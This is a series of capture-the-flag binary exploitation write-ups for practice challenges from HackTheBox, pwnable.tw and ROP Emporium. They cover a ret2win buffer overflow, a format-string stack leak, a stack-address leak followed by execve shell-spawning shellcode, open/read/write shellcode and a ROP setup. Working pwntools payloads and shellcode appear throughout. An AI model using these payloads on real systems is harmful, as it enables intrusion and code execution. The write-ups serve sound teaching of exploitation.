Notes: Case Identification is about finding the bug, or which part of the program is vulnerable, while Solution section is the explanation about how to exploit the program based on the vulnerability found on case identification section.
Keyword: Buffer Overflow, ret2win
Challenge URL: https://app.hackthebox.com/challenges/You%2520know%25200xDiablos
Let's check the binary information and its protection by using checksec
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
Seems like all the security protection of the file is disabled. Since No Canary found and PIE is disabled, meaning that we can simply overflow the program using basic return2win technique.
First of all, we need to know the offset of the buffer until the overflow occured. Lets set a breakpoint on the main
function and create an input just to try to overflow the program. I use cyclic 300
command from pwndbg
for making the payload, and here is what i got when debugging with pwndbg
.
Based on the output above, the Instruction Pointer (EIP
) is not pointing to an address, instead it's pointing to our input payload. In a computer system, EIP
is a pointer that is responsible for storing the memory address of the instruction that will be executed next by the processor. If we gain control over the EIP then we can arbitrarily change the program flow.
Since the EIP
is pointing to the string waab
or 0x626161677
(in hex), we can also change this value to another memory address, which is where the flag is stored. There are 3 user-defined function in this program:
0x080491e2 flag
0x08049272 vuln
0x080492b1 main
Our goal is to get the flag from the flag
function, which is never called somewhere in the code. But before we go deeper, let's analyze the disassembly of main
function to understand the program flow. Here is the snippet:
0x0804930b <main+90> : call 0x8049070 <puts@plt>
0x08049310 <main+95> : add esp,0x10
==> 0x08049313 <main+98> : call 0x8049272 <vuln>
0x08049318 <main+103>: mov eax,0x0
0x0804931d <main+108>: lea esp,[ebp-0x8]
Here, we have main+98
which will call the vuln
function before executing the next instruction. Let's step into that function to analyze further about the program.
0x0804928a <+24>: lea eax,[ebp-0xb8]
0x08049290 <+30>: push eax
==> 0x08049291 <+31>: call 0x8049040 <gets@plt>
0x08049296 <+36>: add esp,0x10
0x08049299 <+39>: sub esp,0xc
0x0804929c <+42>: lea eax,[ebp-0xb8]
0x080492a2 <+48>: push eax
==> 0x080492a3 <+49>: call 0x8049070 <puts@plt>
0x080492a8 <+54>: add esp,0x10
0x080492ab <+57>: nop
0x080492ac <+58>: mov ebx,DWORD PTR [ebp-0x4]
0x080492af <+61>: leave
0x080492b0 <+62>: ret
We found something interesting here. If you look closer, there is a vulnerable part of that function which allows the user to input an arbitrary payload. The gets
function will continue to store characters past the end of the buffer. So it's dangerous to use the gets
function because the program will be vulnerable to a buffer overflow attack.
In addition, there is also a puts function that will print the output based on your input. We can use this later to print out the flag.
Since we know that the gets
function is vulnerable, we can start to exploit the program. Based on our first findings about EIP, the program will overflow when the buffer is greater than 188 characters long. This is proven by the image below.
The next 4 bytes, starting from the 189th character of the payload, will go into the EIP
register. We can manipulate these 4-byte characters so the EIP
will point to and execute the memory address we want. This way, we should replace those 4-byte characters with the starting address of the flag
function, which is 0x080491e2
.
Don't forget about the Byte Ordering of this binary file. The endianness of this file is Least Significant Bit, so we must type the address in reverse order like this: \xe2\x91\x04\x08
. Now let's try our first dummy payload. I use pwntools to do this. Here is the snippet:
p = process('./vuln')
gdb.attach(p, '''
init-pwndbg
break *0x080492af
continue
''')
payload = b'a'*188 + b'\xe2\x91\x04\x08'
p.sendlineafter('0xDiablos:', payload)
Set a breakpoint on 0x080492af
so we can analyze the value of the registers (especially EIP
) just before we hit the return instruction of the vuln
function
Good. If you look closer at the image above, there is a tiny arrow down icon from vuln+62
to the flag
address. This means our payload has successfully manipulated the return address to call the flag
function. But even if you can bypass into the flag
function, there is another problem. There are 2 comparisons as shown in the image below.
Those comparisons most likely use AND operator so you must pass all the conditions in order to get the flag. The first condition (0x08049246
) will compare the first argument with 0xdeadbeef
, while the second condition (0x0804924f
) will compare the second argument with 0xc0ded00d
. If you are still not sure about what's going on, make sure you understand the program flow as shown in the image above.
Before continuing to make the exploit, remember that there is some paddings before we hit the return address. On the x86 architecture, padding generally consists of 8 bytes, whereas on the x64 architecture it consists of 16 bytes. You can check this article for more details.
Now let's make the final exploit to pass those conditions. Based on our findings so far, the final exploit will consists of:
- dummy characters to fill 188 buffer
- Memory address of the
flag
function - 8 bytes padding
- 2x arguments to pass branch conditions (
0xdeadbeef
) and (0xc0ded00d
) in reverse order (LSB)
Execute the solver script and we got the flag. Here is the final script i used to solve this challenge.
Keyword: Format String Vulnerability
Challenge URL: https://app.hackthebox.com/challenges/racecar
This challenge gives us an executable file with all seurity protection enabled. There are many user-defined functions in disassembled code, but some of them are just printing out the menu or text message which is not too useful for solving the challenge.
We just need to focus on the car_menu
because user input occurs in this function. Based on this disassembled car_menu
function, If the user wins the race, the program prompts the user to enter a message. It then attempts to open a file named "flag.txt" and reads its contents.
So our main goal is to trigger the program to prompt user input so we can input our payload there. But how can we even win the race if the outcome is determined by random numbers..
if (((iVar1 == 1) && (iVar2 < iVar3)) || ((iVar1 == 2 && (iVar3 < iVar2)))) {
printf("%s\n\n[+] You won the race!! You get 100 coins!\n",&DAT_00011540);
coins = coins + 100;
puVar5 = &DAT_00011538;
printf("[+] Current coins: [%d]%s\n",coins,&DAT_00011538);
printf("\n[!] Do you have anything to say to the press after your big victory?\n> %s",
&DAT_000119de);
__format = (char *)malloc(0x171);
__stream = fopen("flag.txt","r");
if (__stream == (FILE *)0x0) {
printf("%s[-] Could not open flag.txt. Please contact the creator.\n",&DAT_00011548,puVar5);
/* WARNING: Subroutine does not return */
exit(0x69);
}
fgets(local_3c,0x2c,__stream);
read(0,__format,0x170);
puts(
"\n\x1b[3mThe Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: \x1b[0m"
);
printf(__format);
}
else if (((iVar1 == 1) && (iVar3 < iVar2)) || ((iVar1 == 2 && (iVar2 < iVar3)))) {
printf("%s\n\n[-] You lost the race and all your coins!\n",&DAT_00011548);
coins = 0;
printf("[+] Current coins: [%d]%s\n",0,&DAT_00011538);
}
The program determines the winner based on randomly generated numbers, but we can actually increase our chance to win the game. Here is how it works:
- When you choose car option 1 and select the circuit race (option 2), the relevant code block is executed:
if (((iVar1 == 1) && (iVar2 == 2)) || ((iVar1 == 2 && (iVar2 == 2)))) { iVar2 = rand(); iVar2 = iVar2 % 10; iVar3 = rand(); iVar3 = iVar3 % 100; }
- In this case,
iVar2
(your car number) is generated usingrand() % 10
, which results in a number between 0 and 9. On the other hand,iVar3
(the opponent's car number) is generated usingrand() % 100
, which results in a number between 0 and 99. - Since your car number (
iVar2
) is always less than 10 and the opponent's car number (iVar3
) is between 0 and 99, the conditioniVar2 < iVar3
is highly likely to be satisfied, resulting in winning the race.
- In this case,
- When you choose car (option 2) and select the highway battle (option 1), the relevant code block is executed:
else if (((iVar1 == 1) && (iVar2 == 1)) || ((iVar1 == 2 && (iVar2 == 1)))) { iVar2 = rand(); iVar2 = iVar2 % 100; iVar3 = rand(); iVar3 = iVar3 % 10; }
- In this case,
iVar2
(your car number) is generated usingrand() % 100
, which results in a number between 0 and 99. On the other hand,iVar3
(the opponent's car number) is generated usingrand() % 10
, which results in a number between 0 and 9.
- In this case,
So for summarize, we can win the race if we choose either car option 1 and circuit race (option 2) OR car option 2 and highway battle (option 1). Great, we have successfully triggered user input. Now it's time to figure out how to leverage this user input to exploit the program.
The main vulnerability in this program is a format string vulnerability. It occurs in the car_menu
function after you win the race. Here's the relevant code:
__format = (char *)malloc(0x171);
__stream = fopen("flag.txt","r");
if (__stream == (FILE *)0x0) {
printf("%s[-] Could not open flag.txt. Please contact the creator.\n",&DAT_00011548,puVar5);
exit(0x69);
}
fgets(local_3c,0x2c,__stream);
read(0,__format,0x170);
puts("\n\x1b[3mThe Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: \x1b[0m");
printf(__format);
The vulnerability lies in the last line: printf(__format)
. Here, the program is directly passing user input (__format)
to printf
without any format specifier. This allows an attacker to use format specifiers to read or write memory. Using %x
or %p
specifiers, you can leak values from the stack. Now the question is, what needs to be leaked?
In the car_menu
function, we see this code:
char local_3c [44];
...
fgets(local_3c,0x2c,__stream);
local_3c
is a local array of 44 bytes, declared within the function. Local variables are always stored on the stack. The fgets
function reads up to 44 bytes from the flag file into this local array. This way, we can leak the flag out of the stack. We can just input multiple %p
to exploit the program.
Stack layout visualization of car_menu
function would look something similar like this:
The stack grows upwards in memory. When a function is called, new data is pushed onto the stack at lower addresses. The printf
function expects arguments for each format specifier in the format string. If there aren't enough arguments, printf will still try to read values from the stack for each specifier.
When you call printf(user_input)
instead of printf("%s", user_input)
, you're allowing the user to control the format string. This means the user can include format specifiers that printf
will try to interpret.
printf
starts reading from where it expects the first argument to be. In this case, it's likely to start at the __format
pointer address. Since we're not providing actual arguments to match the format specifiers, printf
keeps reading and moving down the stack (that's why the chall name is racecar :').
Each %p
causes printf to read the next 4 bytes and move to the next word
in memory. Since local_3c
(containing the flag) is a local variable, it's on the stack, making it accessible via this method. This process continues for as many %p
specifiers as you provide, potentially reading through the entire stack frame.
The key point is that each %p
moves the read position 4 bytes down in memory. So if your input is %p %p %p %p %p %p
, you might see output like: 0x62ab0200 0x170 0x60e76dfa 0x2d 0x7 0x26
. You can add fake flag file which contains AAAABBBB
characters so it can be easier to spot where the flag is.
Here is the solver script that i used to implement this solution and solve the challenge.
Keyword: System Call, Shellcode
Challenge URL: https://pwnable.tw/challenge/#1
When you try to disassemble the the binary file, it doesn't have a main
function which is commonly used in many C programs.
Non-debugging symbols:
0x08048060 _start
0x0804809d _exit
0x080490a3 __bss_start
0x080490a3 _edata
0x080490a4 _end
In a standard C program, _start
is provided by the C runtime and it sets up the environment before calling main
. When there is no main
symbol in the program, _start
becomes the direct entry point for the operating system. It's common to use _start
as the entry point when writing pure assembly.
So let's start by analyzing the _start
symbol.
In general, here is the use of some registers in this challenge for making syscall (x86 assembly):
- al (lower 8 bits of eax): stores syscall number. in x86 assembly
4
is for write and3
is for read- bl (lower 8 bits of ebx): stores file descriptor. in x86 assembly,
0
forstdin
and1
forstdout
.- dl (lower 8 bits of edx): length of the buffer in bytes
If you are still confused about those registers, make sure you have read the following repository for more explanation.
Based on the image above, the program pushes the string "Let's start the CTF:" onto the stack (20 bytes) in reverse order. It then writes those 20-byte string to stdout. After writing this string, the program doesn't adjust the stack pointer (there's no add esp, X
instruction before the read).
The read syscall then starts writing data to the stack at the same position where the original string was stored. This means that any input beyond 20 bytes will start overwriting the stack frame.
The vulnerability occurs because the read operation can accept up to 60 bytes, but the available buffer space is only 20 bytes. Any input beyond 20 bytes will overwrite stack memory which can be used for leveraging our attack to control EIP register. But since there are no functions that potentially stores flag, so our main goal is to spawn interactive shell by crafting shellcode.
# 1st payload
payload = b"A"*20
payload += p32(0x08048087)
p.send(payload)
esp = unpack(p.read()[:4])
info("Leaked Address: " + hex(esp))
The first payload will be created to leak the stack pointer (ESP) value. When the function returns, it will jumps to mov ecx, esp
instruction in address 0x08048087
. Since we go back to the write syscall, the program continues to write the value of ECX (containing ESP) to stdout.
In short, the first payload allows the exploit to determine the current stack address which is essential for accurately placing the shellcode in the next stage. This leaked address is then used to calculate where to place the actual shellcode. It ensures that the second payload can accurately jump to the shellcode.
# 2nd payload
shellcode = asm(
"""
xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
mov al, 11
int 0x80
"""
)
payload = b"A"*20
payload += p32(esp+20)
payload += shellcode
For the second payload, we also need to add 20 bytes characters to reach the return address. But instead of returning to the original address, it returns to esp+20
which points to the beginning of the shellcode. esp+20
is calculated to point just after 20 byte characters and the 4-byte return address overwrite.
Why do we need to return to
esp+20
?
esp
is the leaked stack address from the first stage.- '+20' is an offset to point past the buffer and overwritten return address.
- This new address will point to the start of the shellcode in memory.
The 20
in esp+20
is crucial because it accounts for the exact size of the buffer plus the size of the return address, ensuring the jump lands at the start of the shellcode. Here is the final script to solve the challenge.
Keyword: System Call, Shellcode
Challenge URL: https://pwnable.tw/challenge/#2
The goal of this challenge is to read a flag file located at /home/orw/flag
on the server, but with restrictions on which system calls can be used. There are only three syscalls allowed for this challenge: open, read, and write.
Let's examine the disassembled main
function of the binary executable file. Here is the full disassembled main , and here is the snippet:
0x08048566 <+30>: call 0x8048380 <printf@plt>
0x0804856b <+35>: add esp,0x10
0x0804856e <+38>: sub esp,0x4
0x08048571 <+41>: push 0xc8
0x08048576 <+46>: push 0x804a060
0x0804857b <+51>: push 0x0
0x0804857d <+53>: call 0x8048370 <read@plt>
0x08048582 <+58>: add esp,0x10
0x08048585 <+61>: mov eax,0x804a060
0x0804858a <+66>: call eax
0x0804858c <+68>: mov eax,0x0
0x08048591 <+73>: mov ecx,DWORD PTR [ebp-0x4]
0x08048594 <+76>: leave
0x08048595 <+77>: lea esp,[ecx-0x4]
0x08048598 <+80>: ret
- First, those instructions set up and call the
read
function. 0xc8
(200 in decimal) is pushed onto the stack, which is the maximum number of bytes toread
.0x804a060
is pushed onto the stack. This is the address of the buffer where the input will be stored.0x0
(file descriptor forstdin
) is pushed onto the stack.- The read function is then called, which reads up to 200 bytes from
stdin
into the buffer at0x804a060
.
0x08048585 <+61>: mov eax,0x804a060
0x0804858a <+66>: call eax
The key vulnerability is the call eax
instruction at 0x0804858a
. This instruction will execute whatever code is in the buffer at 0x804a060
, which is filled with user input. This is where the vulnerability lies. The program is taking the user's input, which was just read into the buffer at 0x804a060
, and executing it directly as code.
Tap here for the solver script.
Since our input will directly executed as code, we just need to put open, read, and write syscall in order to get the flag. Lets start by the open
syscall in x86 assembly.
xor eax, eax
push eax
add eax, 5
push 0x67616C66
push 0x2f77726f
push 0x2f656d6f
push 0x682f2f2f
mov ebx, esp
mov edx, 0
mov ecx, 0
int 0x80
On x86 assembly, the open
syscall is used to open a file or create a new one. The open
syscall reads the string from where ebx
points (we set ebx
to point to the start of our string on the stack) and keeps reading until it hits the null terminator.
You can refer to this article for more detail. The C-equivalent code of the open
syscall is:
int open(const char *pathname, int flags, mode_t mode)
In assembly, you set up the syscall like this:
- eax: Syscall number (5 for
open
) - ebx: Pointer to the null-terminated string of the pathname
- ecx: Flags (e.g.,
O_RDONLY
,O_WRONLY
,O_RDWR
) - edx: Mode (permissions, only used when creating a new file)
Actually, I have been stuck for hours working on open
syscall. This is because at first I thought that the first three instructions of the payload is equals to mov eax, 5
, so i can just replace those 3 instructions with mov eax, 5
. Those ways are the same for storing 5 into the eax
register, but it's actually wrong.
xor eax, eax
is the preferred way because it doesn't introduce null bytes which is important for crafting shellcode. On the other hand, mov eax, 5
translates to \xb8\x05\x00\x00\x00
in machine code, which contains null bytes. In shellcode, we often need to avoid null bytes (0x00
) because they can terminate strings.
Null terminator is a byte with the value 0 that marks the end of a string. It tells the system "the string ends here". When you pass a string to a syscall, it needs to know where the string ends. It keeps reading memory until it hits a null byte.
The push eax
after xor eax, eax
is crucial. It pushes the value in eax (which is 0) onto the stack, which serves as the null terminator for the filename string that will be constructed next.
Imagine if we didn't have the null terminator, The open
syscall might try to open a file with a much longer, incorrect name, leading to errors or unexpected behavior. The push eax
(when eax
is 0) is indeed used for terminating the name of the file we're going to open.
Stack operations (push
) and register operations (add eax, 5
) are independent. The add eax, 5
instruction is part of syscall preparation, not filename construction. The stack grows upwards and the program executes from top to the bottom (The last item pushed is at the lowest address). Pushing characters in reverse order creates the correct string when read from low to high addresses. Remember that the file is Least Significant Byte so the bytes order is also reversed as well.
/* Read Syscall */
mov eax, 3
mov ecx, ebx
mov ebx, eax
mov edx, 38
int 0x80
/* Write Syscall */
mov eax, 4
mov ebx, 1
int 0x80
The next syscall is about read
and write
. It's much readable than the previous one. The key point of both syscall is about file descriptor. If you ever wondering like this:
Why is the
fd
set to 3 instead of 0? i thought thatread
syscall is about reading input so i would use 0 forstdin
. But why is it 3?
The reason is related to how file descriptors are assigned in Unix-like systems
- 0 is reserved for stdin (standard input)
- 1 is reserved for stdout (standard output)
- 2 is reserved for stderr (standard error)
When you open a new file with the open syscall, the kernel assigns the lowest available file descriptor number. Any subsequent files opened by a process get assigned the next available number, typically starting from 3, for the first file you open in a process.
We use 3 because we want to read from the file we just opened, not from stdin. If we used 0, we'd be reading from stdin (keyboard input) instead of our flag file. In our exploit, we're specifically trying to read the contents of the flag file we just opened, not standard input. That's why we use the file descriptor returned by open (which is 3) instead of 0.
Here is the solver script that i use to complete this challenge.
Keyword: Buffer Overflow, Return Oriented Programming
Challenge URL: https://ropemporium.com/challenge/split.html
A simple Return-Oriented Programming challenge which requires us to exploit buffer overflow vulnerability to execute a specific command that will read the flag. Here is the information of the file:
There are 3 user-defined functions in the binary file: main
, pwnme
, and usefulFunction
. The vulnerable part is in the pwnme()
function, especially in this line: read(0,local_28,0x60)
. Here is the disassembled code of pwnme
function:
void pwnme(void)
{
undefined local_28 [32];
memset(local_28,0,0x20);
puts("Contriving a reason to ask user for data...");
printf("> ");
read(0,local_28,0x60);
puts("Thank you!");
return;
}
The buffer local_28
can only hold 32 bytes safely, but the read()
function is allowed to write up to 96 bytes into this buffer. This means we can write 64 bytes more than the buffer can safely hold. The first 32 bytes fill the buffer as intended. The next 64 bytes will overflow the buffer and write into adjacent memory.
So our ideas is to craft input that's longer than 32 bytes. The extra bytes can be designed to change where the program goes next.